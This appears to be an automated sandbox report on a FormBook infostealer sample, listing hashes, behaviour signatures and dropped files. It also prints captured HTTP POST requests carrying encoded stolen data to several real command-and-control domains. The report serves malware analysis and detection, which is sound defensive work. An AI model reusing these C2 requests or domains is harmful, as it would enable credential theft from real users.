Analysis Report AT113020.exe

Overview

General Information

Sample Name: AT113020.exe
Analysis ID: 326334
MD5: 8477c9b80b4b7796f904ec72abe8ff71
SHA1: edf1c7daed8b5922f727170d9bd51bb00fae2538
SHA256: 772dec92f8ad84f499fbaf384a618c5208e1d5882d753f99aeb396059ffb4f1c

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: AT113020.exe ReversingLabs: Detection: 42%
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.Accfdrv.exe.27f0000.4.unpack Avira: Label: TR/Hijacker.Gen
Source: 1.2.AT113020.exe.2ad0000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.AT113020.exe.27d0000.4.unpack Avira: Label: TR/Hijacker.Gen
Source: 5.2.Accfdrv.exe.2af0000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.Accfdrv.exe.4ac0000.6.unpack Avira: Label: TR/Hijacker.Gen
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00405DBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 5_2_00405DBC

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\AT113020.exe Code function: 4x nop then mov edx, esp 1_2_0048ACB4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 4x nop then mov edx, esp 5_2_0048ACB4

Networking:

Contains functionality to check if a connection to the internet is available
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_040FE488 InternetCheckConnectionA, 5_2_040FE488
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.136.232
Source: Joe Sandbox View IP Address: 23.227.38.74
Source: Joe Sandbox View IP Address: 208.91.197.27
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
URflh=(xeVL0HanowVK6tlTFuYFDOXIDDdETyC03bO2OuNMvbfBhd1rBpIuV9kutgXnT4GczgmbNgoBUJ9v4ZlNPktdMBj(9QdKB3NQ98OqKsX(frmO2j3U8rjpy9fVkx7EdkSDJDX9WJME84fN824OSeteVRTwdxgegRH9zOq(-~zqJ5ClYhUbcTh7jIRrYFyDKtWCuAxotLq6gpxkU~GRrDAM9MvRKYXB1ehE5(P~G0c9KZMoiG8bu60iMof855U96KLtrccJ9yi2AaVkkqDLN9OAD1N9EI2OH~06hY894vTV9Onccfu(ifejc1WOVmlk99mkygnRHHn0LSeHR3dLmBvwYY3oM8x4YSd9wY5aeJVpVRzu0A-xZ7If_hqJ2ZdrR(9ZBSHsh9WZQ8CYbNQDQ).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.renabbeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.renabbeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.renabbeauty.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 30 31 6d 63 5a 4e 51 58 7e 72 72 67 6e 47 52 2d 41 46 42 43 5a 6f 70 64 32 79 55 31 30 6e 63 46 6c 63 30 49 4f 31 51 70 67 55 68 31 66 30 37 44 41 4d 7e 47 61 72 51 58 4f 78 4d 67 44 34 72 6d 78 6e 65 73 64 4f 4a 6e 48 69 72 43 43 36 35 4f 51 4b 56 44 6c 42 4b 46 66 6a 6d 59 71 37 41 4b 7a 58 42 58 5a 65 59 52 61 79 6c 49 47 77 78 41 58 44 32 35 72 4f 51 58 4a 7a 32 41 54 61 35 43 47 62 34 78 47 46 6b 70 4e 39 6c 7a 48 72 28 44 6b 78 43 6a 6b 33 49 36 48 2d 5a 4c 78 62 6c 6b 4c 32 57 5f 33 71 38 64 48 76 37 37 61 53 58 7a 65 31 35 35 75 30 53 50 51 73 7a 4d 46 66 65 55 6d 62 4c 70 39 56 75 6b 4d 49 59 57 76 32 78 37 31 32 75 38 53 2d 4e 30 6c 45 6a 43 56 39 35 61 68 54 75 6d 66 4c 78 7a 68 41 67 76 28 34 7e 31 74 75 64 6f 39 50 57 31 38 61 45 56 76 72 78 54 6f 38 4c 69 45 76 37 41 65 33 76 5f 77 74 30 31 7e 68 59 70 5a 4e 38 76 7a 4b 46 7a 52 41 62 6e 72 79 6d 34 77 71 68 35 6a 58 77 32 79 79 4a 59 4f 69 6d 32 39 76 69 73 58 31 6e 5f 49 74 67 65 72 6d 58 42 71 55 35 59 6f 68 36 59 59 48 4a 36 77 63 31 45 4d 44 4b 4d 6f 73 79 41 52 58 66 62 71 54 38 4b 66 78 7e 5f 75 68 43 30 57 63 77 65 31 70 77 4a 77 79 65 4c 75 4e 55 46 65 4e 42 31 51 5a 62 59 4b 35 56 36 52 57 35 31 7a 61 4e 5f 37 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=01mcZNQX~rrgnGR-AFBCZopd2yU10ncFlc0IO1QpgUh1f07DAM~GarQXOxMgD4rmxnesdOJnHirCC65OQKVDlBKFfjmYq7AKzXBXZeYRaylIGwxAXD25rOQXJz2ATa5CGb4xGFkpN9lzHr(DkxCjk3I6H-ZLxblkL2W_3q8dHv77aSXze155u0SPQszMFfeUmbLp9VukMIYWv2x712u8S-N0lEjCV95ahTumfLxzhAgv(4~1tudo9PW18aEVvrxTo8LiEv7Ae3v_wt01~hYpZN8vzKFzRAbnrym4wqh5jXw2yyJYOim29visX1n_ItgermXBqU5Yoh6YYHJ6wc1EMDKMosyARXfbqT8Kfx~_uhC0Wcwe1pwJwyeLuNUFeNB1QZbYK5V6RW51zaN_7A).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.ahomedokita.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ahomedokita.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ahomedokita.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 32 61 76 61 38 79 71 43 6a 6f 52 49 4c 63 65 58 45 56 4d 5f 63 4a 43 33 28 38 4b 58 66 36 39 66 48 36 55 64 79 32 6b 61 74 44 5a 66 55 4b 6e 73 55 57 4e 6e 56 35 33 43 47 76 57 4e 58 45 62 49 54 57 49 4e 35 6d 79 44 7a 5a 71 36 32 2d 45 46 30 77 66 56 39 57 30 42 63 56 37 67 6a 6d 34 6c 39 53 28 36 62 76 45 6b 36 45 7a 2d 68 77 32 4e 4d 79 73 33 64 63 7e 63 56 65 46 64 7a 64 69 66 62 47 48 75 66 64 48 74 76 4d 51 5f 6e 4a 6c 62 50 75 47 34 6d 73 36 39 63 54 38 6f 6b 41 72 74 4c 38 49 35 7e 4b 73 73 46 6e 6a 65 55 4e 44 46 66 71 49 76 4a 70 39 4a 73 56 59 46 30 5f 46 41 69 43 6c 70 62 71 56 46 6d 31 5a 55 50 6c 4a 4e 46 64 30 31 77 35 77 4f 70 2d 6d 48 71 51 31 6c 7a 5a 72 5f 4d 4a 41 55 37 76 33 32 34 63 63 54 70 63 46 69 6f 41 73 75 6d 6e 4d 37 4f 5f 34 63 34 45 76 78 33 47 41 34 4e 37 7a 34 74 49 54 7a 41 48 4a 58 56 5a 4b 71 37 4e 31 38 30 55 75 48 51 55 56 57 31 5f 28 55 78 78 7e 54 38 6e 38 79 41 42 67 62 4d 67 6b 78 4f 75 36 79 30 35 63 71 6d 43 38 6a 58 75 68 73 78 31 6a 52 58 41 4b 72 39 64 7a 41 37 73 28 42 35 4f 76 59 31 41 48 6a 6d 31 30 43 69 6e 7a 4c 41 7a 6c 74 35 79 61 56 35 77 63 7a 4f 7a 77 56 48 42 59 75 64 31 6c 66 62 48 37 71 73 39 64 71 35 56 6a 66 4a 74 34 6a 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=2ava8yqCjoRILceXEVM_cJC3(8KXf69fH6Udy2katDZfUKnsUWNnV53CGvWNXEbITWIN5myDzZq62-EF0wfV9W0BcV7gjm4l9S(6bvEk6Ez-hw2NMys3dc~cVeFdzdifbGHufdHtvMQ_nJlbPuG4ms69cT8okArtL8I5~KssFnjeUNDFfqIvJp9JsVYF0_FAiClpbqVFm1ZUPlJNFd01w5wOp-mHqQ1lzZr_MJAU7v324ccTpcFioAsumnM7O_4c4Evx3GA4N7z4tITzAHJXVZKq7N180UuHQUVW1_(Uxx~T8n8yABgbMgkxOu6y05cqmC8jXuhsx1jRXAKr9dzA7s(B5OvY1AHjm10CinzLAzlt5yaV5wczOzwVHBYud1lfbH7qs9dq5VjfJt4jBg).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.dainikamarsomoy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dainikamarsomoy.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 5a 35 62 49 47 78 76 62 56 32 6e 41 6c 32 79 65 49 63 69 69 6c 70 7a 33 6c 55 38 77 5a 75 38 52 51 2d 76 46 4a 7a 61 45 78 70 4b 7a 4a 74 51 76 4c 56 5a 57 35 31 37 63 44 32 74 6e 59 65 53 7a 48 6d 45 32 28 36 46 51 32 39 79 75 6a 50 32 74 67 5f 6d 47 71 30 39 4c 67 6a 4b 53 30 6b 45 75 45 75 70 34 4a 6c 50 41 41 70 5a 58 48 73 68 54 6c 66 57 6c 52 6e 78 52 35 57 28 69 53 55 79 71 4f 32 31 4d 69 58 4f 4d 41 61 41 52 4b 78 4e 58 44 4b 6e 34 6a 6b 50 6e 33 35 36 4d 52 6d 48 53 74 64 7a 61 30 65 6f 41 72 38 38 5f 6d 41 79 71 39 56 48 65 62 38 31 53 44 46 65 43 4b 5f 49 64 69 36 6e 66 43 66 66 79 28 37 79 76 31 44 43 79 4e 6a 33 6b 48 41 68 4e 62 41 61 57 55 36 77 59 55 67 61 62 62 45 56 65 67 47 7e 6b 62 62 79 69 68 38 42 5a 4f 78 59 6d 55 52 72 66 32 53 30 48 61 70 63 68 70 63 74 76 6d 76 4c 6b 6b 35 56 4d 41 53 4c 53 70 33 70 58 51 77 69 64 6d 72 4a 4d 56 67 72 5a 65 52 78 64 6c 65 67 6d 36 32 59 67 72 6f 35 4c 36 49 57 77 74 33 43 71 6a 62 76 32 62 55 6d 33 42 64 69 5a 32 67 4a 4a 38 49 6f 4f 57 41 28 49 75 69 74 46 30 63 4f 76 4f 6b 28 61 57 57 30 55 32 57 43 37 28 66 6a 50 41 61 49 48 31 35 76 54 32 32 52 46 78 4a 28 6a 45 33 51 30 50 67 75 46 4d 54 58 73 38 32 66 54 45 6b 5a 46 65 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=Z5bIGxvbV2nAl2yeIciilpz3lU8wZu8RQ-vFJzaExpKzJtQvLVZW517cD2tnYeSzHmE2(6FQ29yujP2tg_mGq09LgjKS0kEuEup4JlPAApZXHshTlfWlRnxR5W(iSUyqO21MiXOMAaARKxNXDKn4jkPn356MRmHStdza0eoAr88_mAyq9VHeb81SDFeCK_Idi6nfCffy(7yv1DCyNj3kHAhNbAaWU6wYUgabbEVegG~kbbyih8BZOxYmURrf2S0HapchpctvmvLkk5VMASLSp3pXQwidmrJMVgrZeRxdlegm62Ygro5L6IWwt3Cqjbv2bUm3BdiZ2gJJ8IoOWA(IuitF0cOvOk(aWW0U2WC7(fjPAaIH15vT22RFxJ(jE3Q0PguFMTXs82fTEkZFeg).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kingdomwinecommunity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingdomwinecommunity.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 50 6f 7a 79 71 59 39 35 71 50 52 42 4c 66 4b 76 57 6e 5a 44 4d 7a 59 37 4e 50 62 72 37 59 65 70 7a 62 68 4e 36 73 76 7a 7e 61 51 58 41 4c 63 55 47 51 42 68 7a 59 63 4e 73 4c 32 6e 6a 43 64 69 37 62 56 71 50 59 7a 6c 58 47 76 79 30 5f 56 6a 65 37 78 4d 43 46 61 57 75 46 72 32 45 71 62 4b 79 78 35 55 64 30 5a 38 64 49 7e 6b 79 4e 6c 51 62 49 39 6f 71 6b 4e 68 36 6d 4a 79 74 32 53 32 74 44 35 43 38 58 73 4a 68 78 45 4b 67 31 75 32 74 73 36 64 53 43 4c 36 52 4a 35 55 54 78 61 72 46 54 4f 37 67 53 4d 6d 28 35 50 58 62 32 76 75 35 33 56 44 28 4e 64 6a 45 4c 4a 65 62 6b 28 6f 59 39 75 63 6b 62 55 6f 73 53 4a 2d 6e 79 50 38 6f 6e 50 78 6f 7a 78 5a 49 4d 6d 38 69 50 4a 54 66 30 6d 77 37 74 39 78 4e 69 72 63 72 66 33 61 61 62 69 76 4c 64 59 46 53 62 49 4b 68 6b 53 31 65 49 54 46 55 53 51 54 6f 6a 47 38 47 36 67 69 6c 46 70 37 64 49 68 46 64 52 37 50 32 55 30 66 55 56 74 39 45 48 59 37 6f 48 46 64 6f 67 35 49 6d 43 78 4d 61 4a 54 70 79 37 33 4c 45 76 44 63 56 76 63 31 45 5a 37 36 76 68 55 49 6d 59 31 71 6a 4e 72 51 7e 46 49 44 51 47 4c 66 59 70 4c 33 53 35 4a 53 4f 65 62 70 48 6a 53 72 50 6e 54 75 31 4c 64 75 35 39 53 4c 67 46 44 38 73 54 55 4c 68 43 51 38 41 44 46 5f 49 54 59 41 48 67 28 75 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=PozyqY95qPRBLfKvWnZDMzY7NPbr7YepzbhN6svz~aQXALcUGQBhzYcNsL2njCdi7bVqPYzlXGvy0_Vje7xMCFaWuFr2EqbKyx5Ud0Z8dI~kyNlQbI9oqkNh6mJyt2S2tD5C8XsJhxEKg1u2ts6dSCL6RJ5UTxarFTO7gSMm(5PXb2vu53VD(NdjELJebk(oY9uckbUosSJ-nyP8onPxozxZIMm8iPJTf0mw7t9xNircrf3aabivLdYFSbIKhkS1eITFUSQTojG8G6gilFp7dIhFdR7P2U0fUVt9EHY7oHFdog5ImCxMaJTpy73LEvDcVvc1EZ76vhUImY1qjNrQ~FIDQGLfYpL3S5JSOebpHjSrPnTu1Ldu59SLgFD8sTULhCQ8ADF_ITYAHg(u6Q).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.pocketspacer.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.pocketspacer.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pocketspacer.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 6b 6b 4d 7a 63 57 4d 6c 7e 7a 51 31 58 7a 32 73 68 76 6f 77 4a 69 46 36 38 30 4b 51 61 42 54 5a 30 4d 7e 35 6b 43 7e 63 6c 6f 62 4a 51 35 7a 78 38 57 38 44 75 71 43 35 4c 42 53 61 6d 6b 30 4e 76 49 51 32 6e 46 4a 4f 53 61 73 56 7a 66 33 61 53 4c 66 50 56 57 75 6a 57 37 4d 68 6a 41 67 30 6e 35 4a 74 4d 50 42 6b 42 7a 4f 73 49 57 7e 4e 66 52 71 53 71 75 70 41 43 4b 42 4c 54 77 31 70 62 47 4a 76 30 68 34 59 64 46 79 2d 6f 75 4f 55 51 76 74 39 59 68 7a 2d 78 37 78 44 76 42 55 76 38 34 30 63 69 37 7e 78 4e 6f 78 44 70 51 54 75 46 6e 62 6b 38 61 4b 35 59 67 6a 68 42 4d 76 75 74 6e 78 51 34 55 62 49 6b 69 51 6b 4b 7a 43 75 43 33 45 33 4f 47 6e 33 4d 6b 50 46 4d 54 36 68 7e 43 47 4e 38 62 59 6b 55 49 47 6d 4b 72 41 38 62 34 4f 71 53 6a 37 59 75 4b 36 61 5a 32 71 58 4b 39 4c 5f 51 42 6d 61 7a 58 28 78 45 45 6c 42 78 33 38 6d 47 55 65 41 4b 4a 38 67 4d 42 57 42 31 53 4e 7a 56 6a 4b 7a 77 76 76 37 28 51 73 57 6d 72 6f 61 64 34 62 69 4b 6b 41 68 47 69 41 41 79 38 7a 35 33 51 66 61 62 7a 4d 6e 74 4c 4f 73 39 57 65 53 52 63 51 58 70 61 53 50 35 6f 32 2d 37 41 78 66 6a 43 63 37 34 6d 6f 6a 51 37 61 36 41 69 6c 4a 35 48 41 4d 37 78 70 63 77 51 61 53 57 58 35 4b 6d 39 30 34 28 37 53 4a 32 77 35 32 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=kkMzcWMl~zQ1Xz2shvowJiF680KQaBTZ0M~5kC~clobJQ5zx8W8DuqC5LBSamk0NvIQ2nFJOSasVzf3aSLfPVWujW7MhjAg0n5JtMPBkBzOsIW~NfRqSqupACKBLTw1pbGJv0h4YdFy-ouOUQvt9Yhz-x7xDvBUv840ci7~xNoxDpQTuFnbk8aK5YgjhBMvutnxQ4UbIkiQkKzCuC3E3OGn3MkPFMT6h~CGN8bYkUIGmKrA8b4OqSj7YuK6aZ2qXK9L_QBmazX(xEElBx38mGUeAKJ8gMBWB1SNzVjKzwvv7(QsWmroad4biKkAhGiAAy8z53QfabzMntLOs9WeSRcQXpaSP5o2-7AxfjCc74mojQ7a6AilJ5HAM7xpcwQaSWX5Km904(7SJ2w52zQ).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.cia3mega.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cia3mega.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cia3mega.info/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 7a 72 6e 4f 51 6d 4b 54 6b 48 79 41 54 68 69 64 55 4c 59 7a 77 65 35 64 33 4a 42 5a 36 52 6c 4b 6a 6b 74 70 55 47 51 52 4c 43 55 37 33 35 46 61 4c 41 73 47 30 74 4f 54 65 75 61 46 53 37 77 39 59 73 56 77 36 75 65 4e 47 5f 50 4d 6b 53 6a 31 6d 56 62 65 66 47 54 64 38 76 32 5f 62 4c 30 43 37 35 47 7a 4f 67 73 53 45 30 33 62 5a 42 48 79 7a 7a 62 56 77 6b 41 6b 68 4c 52 75 4c 6a 62 55 6f 48 6e 51 43 59 33 6c 72 70 6f 67 49 73 30 49 67 7a 76 37 32 6c 4d 38 75 49 77 47 72 50 6b 4b 6c 6f 52 52 59 75 4a 6a 73 77 45 51 33 4b 56 74 45 49 6d 55 39 58 54 6c 54 76 45 74 28 74 47 44 54 65 4c 2d 7a 37 61 62 61 57 4e 56 76 4e 45 45 46 44 55 4d 52 74 59 70 45 50 68 42 32 51 72 6e 6b 79 30 68 74 77 4b 75 6f 4c 6a 4c 42 33 4d 39 35 57 6e 76 6f 75 45 4c 72 6e 6e 4d 63 79 75 2d 52 44 65 31 46 68 52 35 59 52 4e 5a 6d 5f 7e 54 5a 4c 66 4a 55 77 64 70 73 4c 6b 42 32 44 61 63 46 4b 76 46 75 51 34 67 71 4d 6c 70 68 6b 75 47 37 6d 75 76 4c 44 75 49 35 56 4f 35 28 72 6b 39 6f 76 46 6a 7e 6d 65 4c 6e 68 4c 51 44 6d 47 73 75 72 32 4c 59 66 7e 72 69 35 64 35 35 46 4f 61 4c 37 4a 42 64 5f 6d 76 34 6e 4e 6e 74 6c 6d 34 43 39 6e 6d 47 2d 44 45 6a 64 59 36 70 65 31 54 43 58 76 57 42 2d 73 42 55 33 53 57 43 30 37 61 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=zrnOQmKTkHyAThidULYzwe5d3JBZ6RlKjktpUGQRLCU735FaLAsG0tOTeuaFS7w9YsVw6ueNG_PMkSj1mVbefGTd8v2_bL0C75GzOgsSE03bZBHyzzbVwkAkhLRuLjbUoHnQCY3lrpogIs0Igzv72lM8uIwGrPkKloRRYuJjswEQ3KVtEImU9XTlTvEt(tGDTeL-z7abaWNVvNEEFDUMRtYpEPhB2Qrnky0htwKuoLjLB3M95WnvouELrnnMcyu-RDe1FhR5YRNZm_~TZLfJUwdpsLkB2DacFKvFuQ4gqMlphkuG7muvLDuI5VO5(rk9ovFj~meLnhLQDmGsur2LYf~ri5d55FOaL7JBd_mv4nNntlm4C9nmG-DEjdY6pe1TCXvWB-sBU3SWC07a(A).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
